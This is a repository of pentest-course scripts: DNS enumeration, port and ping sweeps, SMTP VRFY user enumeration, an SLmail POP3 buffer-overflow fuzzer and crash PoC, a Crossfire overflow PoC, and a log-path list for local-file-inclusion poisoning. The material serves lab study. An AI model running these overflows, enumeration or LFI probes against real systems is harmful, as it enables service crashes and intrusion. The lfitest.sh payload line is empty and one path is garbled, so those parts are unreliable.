├── DNSforward.sh ├── DNSreverse.sh ├── DNStransfer.sh ├── README.md ├── Slfuzzed.py ├── Slfuzzer.py ├── crossfire-poc.py ├── lfi.txt ├── lfitest.sh ├── portscanner.py ├── powersweep.ps1 ├── ssh-test.sh ├── vrfy.py └── webserver_enum.py /DNSforward.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # DNS forward lookup script for PWK course 3 | 4 | 5 | for subdomain in $(cat list.txt); do 6 | host $subdomain.megacorpone.com | grep "has address"| cut -d " " -f 1,4 7 | done 8 | -------------------------------------------------------------------------------- /DNSreverse.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # DNS reverse lookup script for PWK 3 | for ip in $(seq 72 91); do 4 | host -t ptr 38.100.193.$ip | grep "megacorpone" | cut -d " " -f 1,5 5 | done 6 | -------------------------------------------------------------------------------- /DNStransfer.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # DNS Zone transfer script for PWK 3 | 4 | if [ -z "$1" ]; then 5 | 6 | echo "[*] Simple Zone transfer script" 7 | echo "[*] Usage: $0 " 8 | exit 0 9 | fi 10 | 11 | for ns in $(host -t ns $1| cut -d " " -f 4); do 12 | host -l megacorpone.com $ns | grep " has address" 13 | done 14 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | <#pentesting> 2 | ------------ 3 | Scripts for enumeration. 4 | 5 | Change ip before running 6 | 7 | 8 | portscanner.py: 9 | -------------- 10 | Simple port scanner that uses threads to work faster. Scans TCP and UDP ports. Just tells you what ports are open really quick 11 | 12 | powersweep.ps1: 13 | -------------- 14 | Ping sweeper in Powershell. 
15 | 16 | webserver_enum.py: 17 | ----------------- 18 | Scans ports on an IP or range of IPs to identify if there are any webservers running. 19 | 20 | DNSforward.sh: 21 | ------------- 22 | 23 | DNS forward lookup script to find IP addresses of a website's subdomains 24 | 25 | Requires : list.txt - file that contains a list of domain names to check 26 | 27 | Requires : host - Linux command-line tool to resolve domain names 28 | 29 | 30 | DNSreverse.sh: 31 | ------------- 32 | 33 | DNS reverse lookup script to find domain names associated with IP addresses 34 | 35 | Requires: host - Linux command-line tool to resolve domain names 36 | 37 | 38 | DNStransfer.sh: 39 | -------------- 40 | 41 | DNS zone transfer script to demonstrate a zone transfer from a domain's name server 42 | 43 | Arguments: Domain name 44 | 45 | Requires: host - Linux command-line tool to resolve domain names 46 | 47 | Slfuzzer.py: 48 | ----------- 49 | 50 | Python fuzzer for SLmail application to check for buffer overflow vulnerability 51 | 52 | Modifications: change IP and port number for socket connection before running 53 | 54 | Slfuzzed.py: 55 | ----------- 56 | 57 | Working Python proof-of-concept code for buffer overflow vulnerability in SLmail application 58 | 59 | Modifications: change IP and port number for socket connection before running 60 | 61 | crossfire-poc.py: 62 | ---------------- 63 | 64 | Working Python proof-of-concept code for buffer overflow vulnerability in Crossfire game for Linux 65 | 66 | Modifications: change IP and port number for socket connection before running 67 | 68 | lfitest.sh: 69 | ---------- 70 | 71 | Bash script that prints out PHP shell_exec code for a given list of log file paths 72 | 73 | Requires: lfi.txt - file that contains list of known paths for log files 74 | 75 | lfi.txt: 76 | ------- 77 | 78 | File that contains a list of known paths for log files for both Linux and Windows 79 | 80 | vrfy.py: 81 | ------- 82 | 83 | Python script to enumerate 
username in SMTP server using vrfy command 84 | 85 | Modifications: change ip and port number for socket connection before running 86 | 87 | -------------------------------------------------------------------------------- /Slfuzzed.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # SL mail buffer overflow exploit 3 | import socket 4 | 5 | #badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 6 | 7 | 8 | buffer = "A"*2606 + "B"*4 +"C"* (3500-2606-4) 9 | 10 | 11 | try: 12 | print "Sending evil buffer" 13 | 14 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 15 | connect = s.connect(("10.11.20.130",110)) 16 | data = s.recv(1024) 17 | s.send("USER test\r\n") 18 | data = s.recv(1024) 19 | s.send("PASS " + buffer + "\r\n") 20 | print "\nDone!" 
21 | except: 22 | print "Could not conenct " 23 | 24 | 25 | -------------------------------------------------------------------------------- /Slfuzzer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # SLMail fuzzer to check for buffer overflow 3 | import socket 4 | 5 | buffer = ["A"] 6 | counter = 100 7 | while len(buffer) <= 30: 8 | buffer.append("A"*counter) 9 | counter += 200 10 | 11 | for string in buffer: 12 | print "Fuzzing pass with %s bytes" % len(string) 13 | 14 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 15 | 16 | #print "\nSending buffer.." 17 | connect = s.connect(('10.11.20.130',110)) 18 | s.recv(1024) 19 | #print data 20 | 21 | s.send("USER test" + "\r\n") 22 | s.recv(1024) 23 | #print data 24 | 25 | s.send("PASS"+ string +"\r\n") 26 | s.recv(1024) 27 | #print data 28 | 29 | s.send("QUIT\r\n") 30 | s.close() 31 | 32 | #print "could not connect" 33 | 34 | 35 | -------------------------------------------------------------------------------- /crossfire-poc.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | # Proof of concept for Crossfire game 4 | # Buffer overflow vulnerability 5 | 6 | import socket 7 | 8 | host = "127.0.0.1" 9 | 10 | crash = "\x41" * 4379 11 | 12 | buffer = "\x11(setup sound " + crash + "\x90\x00#" 13 | 14 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 15 | 16 | print "[*]Sending evil buffer..." 17 | s.connect((host,13327)) 18 | s.send(buffer) 19 | data=s.recv(1024) 20 | print data 21 | s.close() 22 | print "[*]Payload Sent!" 
23 | 24 | -------------------------------------------------------------------------------- /lfi.txt: -------------------------------------------------------------------------------- 1 | /etc/httpd/logs/access.log 2 | /etc/httpd/logs/access_log 3 | /etc/httpd/logs/error.log 4 | /etc/httpd/logs/error_log 5 | /opt/lampp/logs/access_log 6 | /opt/lampp/logs/error_log 7 | /usr/local/apache/log/usr/local/apache/logs/usr/local/apache/logs/access.log 8 | /usr/local/apache/logs/access_log 9 | /usr/local/apache/logs/error.log 10 | /usr/local/apache/logs/error_log 11 | /usr/local/etc/httpd/logs/access_log 12 | /usr/local/etc/httpd/logs/error_log 13 | /usr/local/www/logs/thttpd_log 14 | /var/apache/logs/access_log 15 | /var/apache/logs/error_log 16 | /var/log/apache/access.log 17 | /var/log/apache/error.log 18 | /var/log/apache-ssl/access.log 19 | /var/log/apache-ssl/error.log 20 | /var/log/httpd/access_log 21 | /var/log/httpd/error_log 22 | /var/log/httpsd/ssl.access_log 23 | /var/log/httpsd/ssl_log 24 | /var/log/thttpd_log 25 | /var/www/log/access_log 26 | /var/www/log/error_log 27 | /var/www/logs/access.log 28 | /var/www/logs/access_log 29 | /var/www/logs/error.log 30 | /var/www/logs/error_log 31 | C:\apache\logs\access.log 32 | C:\apache\logs\error.log 33 | C:\Program Files\Apache Group\Apache\logs\access.log 34 | C:\Program Files\Apache Group\Apache\logs\error.log 35 | C:\program files\wamp\apache2\logs 36 | C:\wamp\apache2\logs 37 | C:\wamp\logs 38 | C:\xampp\apache\logs\access.log 39 | C:\xampp\apache\logs\error.log 40 | -------------------------------------------------------------------------------- /lfitest.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # script that tests for known log files 3 | # to access when testing for local file inclusion vulnerabilities 4 | # file : lfi.txt 5 | # contains a list of known paths for log files 6 | for line in $(cat lfi.txt);do echo "" >> lfiout.txt 7 | done 8 | 9 | 
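--------------------------------------------------------------------------------
/portscanner.py:
--------------------------------------------------------------------------------
#!/usr/bin/python


# File : portscanner.py
# Author : Pranat Dayal
# Simple port scanner in python.
#
# Only ports positively identified as open are printed. A port that is not
# printed may be closed, filtered, or (for UDP) open but silent, so the
# output is a lower bound on what is listening, not a complete inventory.


import sys
import socket
import threading


def tcp_conn(ip, port):
    """Try a full TCP connect to ``ip:port`` and print the port if it opens.

    ``connect_ex`` completes the handshake, so every open port found here
    also appears as an accepted connection in the target's own logs.
    Nothing is returned; errors are treated as "not open".
    """
    sock_t = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock_t.settimeout(0.5)
    try:
        # connect_ex returns 0 on success and an errno value otherwise.
        if sock_t.connect_ex((ip, port)) == 0:
            print("TCP Port {}: Open".format(port))
    except socket.error:
        # Best effort: name-resolution failures and timeouts mean "not open".
        pass
    finally:
        # Always release the descriptor; one scan creates thousands of sockets.
        sock_t.close()


def udp_scan(ip, port):
    """Send one UDP datagram to ``ip:port`` and print the port if a reply comes.

    A port is reported only when some datagram is received within one
    second. A service that ignores the unrecognised ``test`` payload stays
    silent and is therefore not reported, even though it may be listening.
    """
    sock_u = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    # Set the timeout before any traffic so the wait for a reply is bounded.
    sock_u.settimeout(1.0)
    try:
        sock_u.sendto(b"test", (ip, port))
        sock_u.recvfrom(1024)
        print("UDP Port {}: Open".format(port))
    except socket.error:
        # Timeout or ICMP "port unreachable": nothing answered, nothing to report.
        pass
    finally:
        sock_u.close()


def scan_ports(ip, port_count=1024):
    """Probe TCP and UDP ports ``0 .. port_count - 1`` on ``ip`` concurrently.

    One thread is created per protocol per port, so the default of 1024
    ports starts 2048 threads at once. ``port_count`` is clamped to the
    valid port space (0-65536 ports).
    """
    port_count = max(0, min(int(port_count), 65536))

    workers = []
    for port in range(port_count):
        workers.append(threading.Thread(target=tcp_conn, args=(ip, port)))
        workers.append(threading.Thread(target=udp_scan, args=(ip, port)))

    started = []
    try:
        for worker in workers:
            worker.start()
            started.append(worker)
    finally:
        # Join only threads that actually started; joining an unstarted
        # thread raises RuntimeError and would hide the original failure.
        for worker in started:
            worker.join()


if __name__ == "__main__":

    if len(sys.argv) < 2:
        sys.stderr.write("Usage: {} <target-ip>\n".format(sys.argv[0]))
        sys.exit(1)

    target = sys.argv[1]
    print("Target IP :  {}".format(target))
    try:
        scan_ports(target)
    except Exception as e:
        # Report why the scan stopped instead of exiting silently.
        sys.stderr.write("Scan aborted: {}\n".format(e))
        sys.exit(1)


--------------------------------------------------------------------------------
/powersweep.ps1: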
-------------------------------------------------------------------------------- 1 | <# 2 | .SYNOPSIS 3 | 4 | Powershell ping sweeper 5 | 6 | .PARAMETERS 7 | 8 | ipaddress : Provide a range of IP address (CIDR Accepted) 9 | 10 | #> 11 | 12 | 13 | # Main function that gets called. Requires a CIDR ip range or "-" seperated start and end IP range 14 | 15 | function powersweep(){ 16 | 17 | 18 | [CmdletBinding()] 19 | Param 20 | ( 21 | [parameter(mandatory=$true,valuefrompipeline=$true,helpmessage="Example : 192.168.1.1 or 192.168.1.0/24 or 192.168.1.1-192.168.1.20")] 22 | [string]$ipaddress 23 | 24 | ) 25 | 26 | Write-Output "IP address: $ipaddress" 27 | 28 | # Detects CIDR 29 | if ($ipaddress -match "\/") 30 | { 31 | 32 | 33 | Write-Output "CIDR detected" 34 | #splits it up into start and end 35 | $startIP= Get-IPV4NetworkStartIP($ipaddress) 36 | $endIP = Get-IPV4NetworkEndIP($ipaddress) 37 | 38 | } 39 | # Detects range 40 | elseif ($ipaddress -match "\-") 41 | { 42 | 43 | Write-Output "Range Detected" 44 | #casts to IP address type 45 | $startIP=[System.Net.IPAddress]$ipaddress.Split("-")[0] 46 | $endIP=[System.Net.IPAddress]$ipaddress.Split("-")[1] 47 | 48 | } 49 | Write-Output "$startIP : $endIP" 50 | 51 | #calls a parallel workflow and searches for lines with ttl 52 | ParallelSweep -startip $startIP -endip $endIP | select-string ttl 53 | } 54 | 55 | # Gets the start IP from a CIDR network 56 | 57 | Function Get-IPV4NetworkStartIP ($strNetwork) 58 | { 59 | $StrNetworkAddress = ($strNetwork.split("/"))[0] 60 | $NetworkIP = ([System.Net.IPAddress]$StrNetworkAddress).GetAddressBytes() 61 | [Array]::Reverse($NetworkIP) 62 | $NetworkIP = ([System.Net.IPAddress]($NetworkIP -join ".")).Address 63 | $StartIP = $NetworkIP +1 64 | #Convert To Double 65 | If (($StartIP.Gettype()).Name -ine "double") 66 | { 67 | $StartIP = [Convert]::ToDouble($StartIP) 68 | } 69 | $StartIP = [System.Net.IPAddress]$StartIP 70 | Return $StartIP 71 | } 72 | 73 | 74 | # Gets the end IP from a CIDR 
network 75 | Function Get-IPV4NetworkEndIP ($strNetwork) 76 | { 77 | $StrNetworkAddress = ($strNetwork.split("/"))[0] 78 | [int]$NetworkLength = ($strNetwork.split("/"))[1] 79 | $IPLength = 32-$NetworkLength 80 | $NumberOfIPs = ([System.Math]::Pow(2, $IPLength)) -1 81 | $NetworkIP = ([System.Net.IPAddress]$StrNetworkAddress).GetAddressBytes() 82 | [Array]::Reverse($NetworkIP) 83 | $NetworkIP = ([System.Net.IPAddress]($NetworkIP -join ".")).Address 84 | $EndIP = $NetworkIP + $NumberOfIPs 85 | If (($EndIP.Gettype()).Name -ine "double") 86 | { 87 | $EndIP = [Convert]::ToDouble($EndIP) 88 | 89 | } 90 | $EndIP = [System.Net.IPAddress]$EndIP 91 | Return $EndIP 92 | } 93 | 94 | 95 | 96 | # Gets start and end network addresses (not including host octet) 97 | Function Get-network($startip ,$endip) 98 | { 99 | 100 | $network_s = @() 101 | $network_e = @() 102 | 103 | $startaddr = $startip.IPAddressToString 104 | $endaddr = $endip.IPAddressToString 105 | 106 | # $octets_s=@() 107 | # $octets_e=@() 108 | 109 | $octets_s = $startaddr.Split("{.}") 110 | 111 | $octets_e = $endaddr.Split("{.}") 112 | 113 | $startnum = $startaddr.Split("{.}")[3] 114 | $endnum = $endaddr.Split("{.}")[3] 115 | 116 | # Write-Output $octets_s 117 | 118 | for($i=0;$i -lt 3;$i++){ 119 | 120 | $network_s += $octets_s[$i]+"." 121 | $network_e += $octets_e[$i]+"." 122 | } 123 | 124 | return $network_s ,$network_e 125 | } 126 | 127 | 128 | 129 | 130 | # USELESS 131 | # gets a list of subnets 132 | # - not really. 
Im keeping it incase i realise what i was trying to do 133 | <# 134 | Function Get-subnets($startip,$endip) 135 | { 136 | 137 | $startaddr=$startip.IPAddressToString 138 | $endaddr=$endip.IPAddressToString 139 | 140 | $out = "False" 141 | 142 | $subnets=@() 143 | 144 | if($startaddr -le $endaddr){ 145 | for($i=0;$i -lt 4;$i++) 146 | { 147 | for($k=0;$k -lt 4;$k++) 148 | { 149 | 150 | if($startaddr[$i] -lt $endaddr[$k]) 151 | { 152 | $subnets+=$startaddr 153 | } 154 | 155 | } 156 | 157 | } 158 | 159 | } 160 | else 161 | { 162 | $out = "no" 163 | } 164 | return $subnets 165 | 166 | } 167 | #> 168 | 169 | # Work flow to ping ip addresses 170 | workflow ParallelSweep 171 | { 172 | 173 | Param( 174 | [System.Net.IPAddress]$startip, 175 | [System.Net.IPAddress]$endip 176 | 177 | ) 178 | 179 | #$subnets=Get-subnets $startip $endip 180 | 181 | #Write-Output $subnets 182 | 183 | $network_sub= Get-network -startip $startip -endip $endip 184 | 185 | $network_start = $network_sub[0] 186 | $network_end = $network_sub[1] 187 | 188 | $endaddr = $endip.IPAddressToString 189 | $endhost = $endaddr.Split("{.}")[3] 190 | 191 | 192 | #$network = $subnets[0]+$subnets[1]+$subnets[2] 193 | #Write-Output $network 194 | 195 | 196 | 197 | foreach -parallel -throttlelimit 4 ($i in 0..$endhost) 198 | 199 | { 200 | $newnet = $network_start+$i -join "" 201 | ping -n 1 -w 100 $newnet 202 | 203 | if ($network_start -ne $network_end) 204 | { 205 | 206 | $endnet = $network_end+$i -join "" 207 | ping -n 1 -w 100 $endnet 208 | 209 | } 210 | } 211 | 212 | } 213 | 214 | powersweep -ipaddress 192.168.1.0-192.168.1.40 -------------------------------------------------------------------------------- /ssh-test.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | rm ssh_ok no_ssh no_auth ssh_up other 4 | 5 | while read ip host ; do 6 | 7 | # status=$(ssh -o BatchMode=yes -o ConnectTimeout=5 $ip echo ok 2>&1) 8 | 9 | status=$(ssh -o BatchMode=yes -o 
StrictHostKeyChecking=no -o ConnectTimeout=5 $ip echo ok 2>&1) 10 | case $status in 11 | ok) echo $ip $host >> ssh_ok ;; 12 | *"No route to host"*) echo $ip $host $status >> no_ssh ;; 13 | *"Permission denied"*) echo $ip $host $status >> no_auth ;; 14 | *"Host key verification failed"*) echo $ip $host $status >> ssh_up;; 15 | *) echo $ip $host $status >> other ;; 16 | esac 17 | 18 | done < ip.list 19 | -------------------------------------------------------------------------------- /vrfy.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # SMPT username enumeration (VRFY) script 3 | import socket 4 | import sys 5 | 6 | if len(sys.argv) !=2: 7 | print "Usage: vrfy.py " 8 | sys.exit(0) 9 | 10 | #create socket 11 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 12 | #connect to socket 13 | connect = s.connect(('10.11.1.217',25)) 14 | #receive banner 15 | banner = s.recv(1024) 16 | print banner 17 | #VRFY user 18 | s.send('VRFY ' + sys.argv[1] + '\r\n') 19 | result = s.recv(1024) 20 | print result 21 | #close the socket 22 | s.close() 23 | -------------------------------------------------------------------------------- /webserver_enum.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | # File : webserver_enum.py 4 | # Makes HTTP GET requests to various common ports 5 | # to find a list of webservers 6 | 7 | # Accepts CIDR Input 8 | # Command line usage : python webserver_enum.py 192.168.1.0/24 0-1024 9 | 10 | 11 | import socket 12 | import sys 13 | import httplib 14 | import threading 15 | import ipaddress 16 | 17 | RESPONSE_CODES = [200 # Success 18 | ,301 # Permanent redirect 19 | ,302 # Temporary redirect 20 | ,304 # Not modified 21 | ,403 # Forbidden 22 | ,404 # Page not found 23 | ,500 # Server side error] 24 | 25 | # common ports for http 26 | DEFAULT_PORTS = [80,8080,3000,3001,1337,9393] 27 | 28 | # input ports - only use if port 
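# specifications are provided
INPUT_PORTS = []


# final list of webserver scan results
WEBSERVER_IP = []


def http_port_scan(ip, port):
    """Send one plain-HTTP ``GET /`` to ``ip:port`` and classify the answer.

    Returns a ``(status, message)`` tuple. ``status`` is True only when a
    response arrives whose status code is listed in the module-level
    RESPONSE_CODES; ``message`` is ``"<ip>:<port> <detail>"``, where the
    detail is the reason and status code, or an error description.

    Limits to keep in mind when reading the results:
    * the 0.1 s timeout is short, so slow or distant servers are missed;
    * only plain HTTP is spoken, so a TLS-only listener will normally not
      be counted;
    * a server answering with a code outside RESPONSE_CODES is not counted.
    """
    h = httplib.HTTPConnection(ip, port, timeout=0.1)
    status = False

    try:
        h.request('GET', '/')
        r = h.getresponse()
        msg = str(r.reason) + ' ' + str(r.status)

        if r.status in RESPONSE_CODES:
            status = True
    except socket.error as e:
        # A timeout carries no strerror, so fall back to the exception text.
        msg = e.strerror or str(e)
    except Exception:
        # Presumably a peer that answered with something that is not HTTP.
        msg = 'Unexpected error'
    finally:
        # Release the socket on every path; a sweep opens one per ip/port.
        h.close()
    return status, ip + ':' + str(port) + ' ' + str(msg)


def scan_r(ip, port):
    """Probe one port and record a hit in WEBSERVER_IP.

    Returns True when ``http_port_scan`` reports a web server, else False.
    """
    result = http_port_scan(ip, port)
    if not result[0]:
        return False

    print(" [!] Webserver at: :  {} {}".format(ip, port))
    print(result)
    WEBSERVER_IP.append(result)
    return True


def scan_t(ip, ports=DEFAULT_PORTS):
    """Probe every port in ``ports`` on ``ip``, one thread per port.

    All threads are started together and then joined, so a large port list
    creates that many simultaneous connections to the host.
    """
    threads = [threading.Thread(target=scan_r, args=(ip, port))
               for port in ports]

    for t in threads:
        t.start()
    for t in threads:
        t.join()


def _parse_ports(spec):
    """Turn a port argument into a list of port numbers.

    Accepts a single port ("8080") or an inclusive range ("8000-8100").
    Raises ValueError when the text is not numeric, the range is reversed,
    or a port lies outside 0-65535.
    """
    first, dash, last = spec.partition("-")
    start_p = int(first)
    end_p = int(last) if dash else start_p
    if not (0 <= start_p <= end_p <= 65535):
        raise ValueError("invalid port specification: " + spec)
    # The end of the range is included, so "80-443" also probes 443.
    return list(range(start_p, end_p + 1))


def main():
    """Sweep a CIDR range for web servers and print the collected hits.

    Usage: ``python webserver_enum.py [CIDR [port | start-end]]``. Without
    arguments the range is read from standard input; without a port
    argument DEFAULT_PORTS is used.
    """
    ports = DEFAULT_PORTS
    argc = len(sys.argv)

    if argc == 1:
        iprange = raw_input("Enter IP range (CIDR) : ")
    elif argc in (2, 3):
        iprange = sys.argv[1]
    else:
        sys.stderr.write(
            "Usage: python webserver_enum.py [CIDR [port | start-end]]\n")
        sys.exit(1)

    if argc == 3 and sys.argv[2]:
        port_arg = sys.argv[2]
        try:
            # A bare port used to be left as a string and was then iterated
            # character by character; always build a list of integers.
            INPUT_PORTS[:] = _parse_ports(port_arg)
        except ValueError as e:
            sys.stderr.write("Bad port argument: {}\n".format(e))
            sys.exit(1)
        if "-" in port_arg:
            print("port range:  {} {}".format(INPUT_PORTS[0], INPUT_PORTS[-1]))
        ports = INPUT_PORTS

    try:
        # ip_network is handed unicode text, as before. strict=False lets an
        # address with host bits set (192.168.1.10/24) stand for its network.
        net = ipaddress.ip_network(iprange.decode("utf-8"), strict=False)
    except ValueError as e:
        sys.stderr.write("Bad IP range: {}\n".format(e))
        sys.exit(1)

    for ip in net:
        print("[*] Checking Target :  {}".format(ip))
        addr = str(ip)
        scan_t(addr, ports)

    print(WEBSERVER_IP)


# Run the sweep only when executed as a script, not when imported.
if __name__ == "__main__":
    main()


--------------------------------------------------------------------------------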